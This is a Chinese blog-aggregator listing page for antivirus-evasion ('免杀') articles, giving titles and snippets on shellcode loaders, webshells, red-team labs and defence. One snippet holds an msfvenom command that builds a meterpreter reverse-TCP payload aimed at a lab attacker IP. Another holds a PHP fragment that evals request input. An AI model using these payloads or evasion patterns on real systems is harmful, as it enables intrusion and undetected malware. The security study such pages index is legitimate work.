免杀

木马免杀 学习方案

目录️1.Web页面源码分析用于信息收集的技术点技术点与技术栈2.敏感文件读取的信息收集分析前后分析️细化步骤与网络安全分析3.信息收集的前后关联与技术栈前后关联分析技术栈总结4.全局总结⚔️5.攻击技术链攻击链可视化️1.Web页面源码分析用于信息收集的技术点Web页面源码分析是红队渗透测试的初始步骤,通过检查HTML、JavaScript、CSS和其他资源,识别潜在漏洞、暴露的敏感信息、文件路
浩策·2025-06-24 23:14

免杀】C2免杀技术(十四)Inline Hook

关于InlineHook相关概念和环境准备详见上篇文章【免杀】C2免杀技术(十三)InlineHook概念篇-CSDN博客,本文主要演示该技术的免杀效果InlineHook免杀效果演示这里还拿之前文章里的
仇辉攻防·2025-06-10 01:31

shellcode静态免杀思路

shellcode免杀基础技能概括免杀需要有一定的编程能力,主要学习的是思路,然后用这些思路进行一些变种组合进行杀软对抗。直接从网上copy代码,可能copy的代码存在指纹特征而导致免杀失败。
北岭敲键盘的荒漠猫·2025-06-10 01:31

2025年渗透测试面试题总结-匿名[实习]安全工程师(大厂) (3)(题目+回答)

目录匿名[实习]安全工程师(大厂)(3)一面1.Java内存马原理与利用2.Java内存马查杀3.冰蝎与哥斯拉原理4.实习项目经验5.WAF绕过实战经验6.Webshell免杀原理7.CobaltStrike
独行soc·2025-05-26 13:17

勒索病毒科普及防御措施

目前主流的防护方式是杀毒软件,但是杀毒软件的缺陷就是,滞后于一些免杀技术。在服务器端,如果没有大量的频繁写入,场景足够单一的话,目前白名单方式的防护相对更加安全一些,因为能
极创信息·2025-05-22 02:33

kali制作安卓免杀木马——kali工具绑捆

俗称为免杀官网:https://www.shellterproject.com/目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话就需要安装wine环境来运行
网络安全渗透丫·2025-05-17 05:17

2025年渗透测试面试题总结-某互联网500强甲方红队攻防研究员面试题(题目+回答)

目录某互联网500强甲方红队攻防研究员面试题1.免杀技术(2025年演进)2.PHP5与PHP7+核心区别与漏洞利用3.Log4j漏洞检测与不出网利用4.Fastjson不出网利用5.Java内存马(2025
独行soc·2025-05-08 00:47

泷羽sec学习打卡-安全见闻1-3

如涉及侵权马上删除文章笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负渗透思路流程:信息收集–漏洞扫描–漏洞挖掘–开始攻击–权限维持(持久化)–权限提升–免杀隐藏
文人sec·2025-04-29 07:21

静态免杀技术分析:原理、方法与实战应用

静态免杀技术分析:原理、方法与实战应用关注我,后面将免费更新免杀和漏洞原理文章作者:Factor静态免杀技术分析:原理、方法与实战应用一、静态免杀的检测原理回顾安全软件静态扫描依赖的关键特征典型被标记的静态特征有哪些
Factor安全·2025-04-10 13:09

网络攻防——kali操作系统基本使用

2.环境安装    生成木马主要需要如下工具:kali操作系统,VMware15(搭建kali操作系统环境,防止影响自己的windows系统的正常运行),Themida(免杀加壳工具,防止被电脑或者手机的安全工具查杀
Jerry说前后端·2025-04-02 15:31

黑客攻防从入门到精通(第一篇:认识黑客)

伪装成正常程序),网页木马(有人访问时,利用对方系统或者浏览器的漏洞自动将配置好木马的服务下载到访问者的计算机上自动执行),挂马,后门(重新控制计算机)IPC$,shell,webshell,溢出,注入,注入点免杀
晓生夜梦·2025-03-16 12:15

2024护网行动 _ 红队实战手册 (建议收藏)零基础入门到精通

整理后转于klionsec的github基本流程:入口权限=>内网搜集/探测=>免杀提权[非必须]=>抓取登录凭证=>跨平台横向=>入口维持=>数据回传=>定期权限维护0x01入口权限获取[前期侦察,搜集阶段本身就不存在太多可防御的点
编程瞬息全宇宙·2025-03-12 08:14

红队内网攻防渗透:内网渗透之内网对抗:实战项目&VPC2打靶&父子域三层路由&某绒免杀&下载突破&约束委派&域控提权

红队内网攻防渗透实战网络攻防靶场记录1.靶机配置信息讲解2.靶场渗透完整流程2.1入口点:192.168.139.130(win2008R2)2.1.1tomcat后台war包获取权限2.1.2tomcat使用后门上线CS平台2.1.3信息收集获取数据库密码2.2入口点横向:192.168.10.11(win2012SQL)2.2.1SQLserver密码复用获取系统权限2.3入口点横向:192.
HACKNOE·2025-02-23 18:28

玄机靶场--第一章 应急响应-webshell查杀

xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shellgithub地址的md5flag{md5}3.黑客隐藏shell的完整路径的md5flag{md5}注:/xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完整路径
Clockwiseee·2025-01-31 23:24

通用免杀概论

免杀:病毒木马免于被杀毒软件查杀,基于免杀的技术包含逆向工程、反汇编、系统漏洞等hack技术企业目前标配防护:EDR(终端主机防护)、IPS、IDS、HDR(流量监控)、XDR(相较于EDR更高级),早期的话
曦梦逐影·2025-01-26 15:01

PHP一句话木马免杀方式汇总

目录PHP一句话木马免杀学习一句话木马的变形1.相同功能函数替换2.使用变量3.使用字符串拼接、大小写混淆、字符串逆序组合4.自定义函数5.回调函数6.str_replace函数7.base64_decode
A 八方·2024-08-23 19:44

防御保护--防病毒网关

目录网络安全之防病毒网关--恶意软件按照传播方式分类熊猫烧香蠕虫病毒木马病毒按照功能分类后门勒索挖矿恶意代码的特征下载特征后门特征信息收集特性自身隐藏特性文件感染特性网络攻击特性病毒传播途径恶意代码的免杀技术反病毒技术单机反病毒杀毒软件网关反病毒反病毒防火墙
为梦想而战@大学生·2024-02-20 09:08

进程链信任-父进程欺骗

文章目录前记普通权限的父进程欺骗ShllCode上线进程提权基础进程提权注入前记父进程欺骗作用:进程链信任免杀进程提权检测:etw普通权限的父进程欺骗#include#include#includeDWORDgetpid
coleak·2024-02-20 06:50

渗透测试-木马免杀的几种方式

前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。
白面安全猿·2024-02-13 14:56

Avaddon勒索病毒解密工具

该勒索病毒使用C++语言进行编写,采用RSA-2048和AES-256加密算法对文件进行加密,该勒索病毒的传播方式多种多样,前期主要通过垃圾邮件附件JS/PowerShell恶意脚本等无文件技术进行传播,免杀效果非常好
熊猫正正·2024-02-13 12:02

Python常见的免杀方式

使用pyinstaller生成的可执行文件本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被杀的可能。
Lyx-0607·2024-02-10 04:22

创新方案|经济下行周期下企业避免杀价内卷侵蚀利润亟需5种创新定价策略

随着通胀持续、全球经济衰退逆风让消费者谨慎支出,绝大多数企业都担心如何刺激购买且保持利润率。在本研究认为,公司不应该简单地调整价格,而应该创造性地借鉴其他行业定价打法,通过创新定价选项的组合,增加向客户计价的新方法。推荐可用的5大定价策略,能取悦现有客户并吸引新客户:满足具有不同使用需求的买家,吸引预算紧张的人,刺激喜欢好交易的客户购买,在产品价值不确定时实现优惠价格,并提高业务效率。经济逆风周期
Runwise 即能创新·2024-02-09 08:02

某客户单位模拟应急演练(双网卡状态下,Socks5隧道搭建进行内网攻击)

文中内容,均属虚构,仅供学习使用,请勿进行真实攻击描述模拟对客户内部办公网络进行攻击,通过各种手段,将后门文件传入客户的电脑中,其中有几个关键因素:后门文件需要过杀软(此处不涉及,不会免杀,明面上见到的免杀工具尝试了很多
Acczdy·2024-02-07 07:34

揭密某黑产组织新型免杀攻击样本

你以为躲在这里就找不到你吗?没用的,你那样拉风的男人无论在哪,都像黑夜里的莹火虫那样的鲜明、那样的出众,你那忧郁的眼神稀嘘的胡渣子,神乎其技的刀法,还有那杯Drymartine,都深深的迷住了我……概述一年一度的活动结束了,各位红蓝队的兄弟们都辛苦了,活动虽然己经结束,但是真实的攻击从来没有停止过,安全意识要常态化,跟之前一样笔者及笔者团队今年仍然以协助其他团队进行样本的分析、溯源等相关工作,主要
熊猫正正·2024-02-06 06:46

爆改自用免杀2.0-绕过主流杀软机制

文章开头,上次写的免杀
知攻善防实验室·2024-02-04 05:57

记一次“微信交流群“内免杀木马分析以及溯源

关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!反编译得到源码拿到文件
知攻善防实验室·2024-02-04 05:26

2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀

Python关键代码:2、完整代码:多线程配合Queue进行全端口扫描二、子域名扫描三、客户端,服务端Socket编程通信cmd命令执行1、客户端:2、服务端:四、python代码shellCode编码免杀
++⁠⁠·2024-02-03 20:53

测试 35 个 webshell 检测引擎的查杀结果

最近发现了一个有意思的使用分支对抗技术制作的PHPWebshell开源项目,共数十个查杀引擎免杀,项目地址:https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP
知白y·2024-02-02 15:15

python免杀

实验靶机:win10攻击机:kali192.168.117.1291.先在kali上输入msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.117.129LPORT=4444-fpy打开vs新建一个python文件、写入64位加载#!/usr/bin/pythonimportctypes#这里直接粘贴刚刚msf生成的shellcod
只喜欢打乒乓球·2024-02-02 12:49

测试 35 个 webshell 检测引擎的查杀结果

最近发现了一个有意思的使用分支对抗技术制作的PHPWebshell开源项目,共数十个查杀引擎免杀,项目地址:https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP
AtlantisLab·2024-02-02 03:57

silic group第五版php木马,php一句话后门特征码与免杀-zz

作者:YoCoSmart来自:SilicGroupHackerArmy[BlackBap.Org]首先我们要明白什么是一句话木马。“一句话”是一种特征性很强的脚本后门的统称和简称,其特征就是代码很短,短到甚至只有一句话,但是却能用这句很短的代码,完成无数的复杂功能。我们来对下面这样的一个一句话进行简单剖析:复制代码这是php的一句话后门中最普遍的一种。它的工作原理是这样的:首先存在一个变量,变量名
无脸纸片人·2024-02-01 14:37

测试 35 个 webshell 检测引擎的查杀结果

最近发现了一个有意思的使用分支对抗技术制作的PHPWebshell开源项目,共数十个查杀引擎免杀,项目地址:https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP
云宝的黑客对抗日记·2024-01-31 13:24

红日靶场2打点记录

因为之前成功用冰蝎免杀360,把权限反弹到了MSF上,然后MSF把权限反弹到CS上所以这次咱们走捷径直接通过反序列化漏洞连接(就是关掉360)因为权限弹来弹去感觉好麻烦提示大家如果想要免杀360千万别学我
曼达洛战士·2024-01-31 04:21

红日靶场2 ATT&&CK攻击

360免杀其实没有你想象的那么难首先最重要的是你要用免杀脚本对你所生成的木马病毒进行加密然后加密系统的内核,就是上一篇文章所提及的是通过两次加密之后所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的
曼达洛战士·2024-01-31 04:51

WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀

163CTF-Web入门-164CTF-Web入门-165CTF-Web入门-166CTF-Web入门-167CTF-Web入门-168CTF-Web入门-169-170知识点1、文件上传-二次渲染2、文件上传-简单免杀变异
@墨竹·2024-01-27 01:39

day 32 文件上传&二次渲染&.htaccess&变异免杀

前言:#知识点:1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性#详细点:1、检测层面:前端,后端等2、检测内容:文件头,完整性,二次渲染等
匿名用户0x3c·2024-01-27 01:38

day32WEB 攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀

本章节知识点:1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性前置知识:后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外
aozhan001·2024-01-27 01:37

webshell以及免杀方式

Webshell简介Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称作为一种网页后门。攻击者在入侵了一个网站后,通常将asp或php后门文件与网站服务器Web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的Webshell的作用1、维持远程访问2、全线提升3、发动网
搬码人·2024-01-26 03:08

php免杀

php中有一个有意思的特性,就是字符串也能使用自加运算符++c=$_GET['id'];}}$cc=newtest;$cc=$cc->c;eval($cc);
weixin_45111459·2024-01-25 20:21

远程控制---实验十:灰鸽子远控软件使用实验

任一部分都会被主流的杀毒软件查杀,但随着其不断衍生新的变种和一些免杀技巧经常绕过一些主
DDdd...·2024-01-25 16:35

【网络安全】简单的免杀方法(基本知识)

目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visualstudio7、数字签名四、关于杀软排名不分前后
网安导师小李·2024-01-24 19:42

32、WEB攻防——通用漏洞&文件上传&二次渲染&.htaccess&变异免杀

文章目录一、点过滤二、文件删除三、二次渲染四、.htaccess五、过滤php关键函数一、点过滤不能写带文件后缀的文件名;IP转数字二、文件删除文件依据规则进行删除,删除有两种删除的类型:什么文件都删除,条件竞争进行绕过后门代码删除,后门代码写到远程地址,再包含直接包含到.user.ini三、二次渲染需要配合文件包含漏洞,如果没有文件包含漏洞,需要使用.user.ini进行php环境配置,当然访问
PT_silver·2024-01-23 20:14

记一次多平台免杀PHP木马的制作过程

InazumaPuzzle程序锁定器PerlinNoise危险函数生成与执行类构造函数基于时间的随机值生成器排列表生成器梯度表生成器埋有后门的柏林噪声生成器柏林噪声显示器程序主干参考资料前言最开始萌生出写免杀
御坂19008号·2024-01-23 00:47

黑客的价值观观后感

黑客商业化,黑色产业链已经很成熟:免杀,盗号,挂马,黑站,传播病毒……这一切让我们吃惊,让我们的黑客精神不复存在。黑客在普通民众心中已经成为邪恶的代名词。
叁_d5bd·2024-01-22 21:58

十个查杀引擎免杀的PHP Webshell

工具介绍使用分支对抗技术制作的PHPWebshell,截止2024年1月18日,共数十个查杀引擎免杀。安装与使用一、绕过点使用刻意编写的变量覆盖漏洞传递参数;使用线性代数中的循环群运算原理制作程序
学安全的修狗·2024-01-22 19:43

小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版

链接请订阅专栏:物联网协议深度剖析置顶博客中第1天-操作系统_名词_文件下载_反弹shell_防火墙绕过.mp4第2天:web应用_架构搭建_漏洞_http数据包_代理服务器.mp4第3天:抓包_封包_协议_app_小程序_pc应用_web应用.mp4第4天:30余种加密编码进制_web_数据库_系统_代码_参数值.mp4第5天:资产架构_端口_应用_cdn_waf_站库分离_负载均衡.mp4第6
love0everything·2024-01-19 11:34

远控免杀从入门到实践(1):基础篇

2、文中提到的杀软检测指标是virustotal.com(简称VT)上在线查杀结果,所以只是代表了静态查杀能力,数据仅供参考,不足以作为杀软查杀能力或免杀工具的判断指标。
扶苏゜·2024-01-19 02:17

WAF攻防相关知识点总结2-代码免杀绕过

WAF的检测除了有对于非正常的流量检测外还对于非正常的数据包特征进行检测以宝塔为例在宝塔的后台可以放置一句话木马的文件宝塔不会对于这个文件进行拦截,但是一旦我们使用菜刀蚁剑等webshell工具去进行连接的时候,数据报中有流量特征就会被拦截经过检测可以知道是waf对于数据报中的关键字进行了检测绕过思路传参绕过:waf拦截使用的是正则表达式,匹配函数的关键字绕过思路就是把关键字的函数代码以参数值的形
网安?阿哲·2024-01-19 00:56

手工病毒查杀

手工病毒查杀技术:通过对目标系统的系统进程、网络连接状态、随机启动项等信息进行综合分析与判断,结合使用各种系统命令与工具,手动确认与清除病毒(木马)的技术手工病毒查杀的意义:对于较新的或者做过免杀处理的病毒
TEST_a130·2024-01-17 16:55

浅析Pe2shellcode

前言众所周知,对shellcode免杀是很流行的技术,但是直接对exe的免杀方法相对稀缺,如果我们能将exe转为shellcode,然后用shellcode免杀那一套就会简单许多。
杭州默安科技·2024-01-16 04:23
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他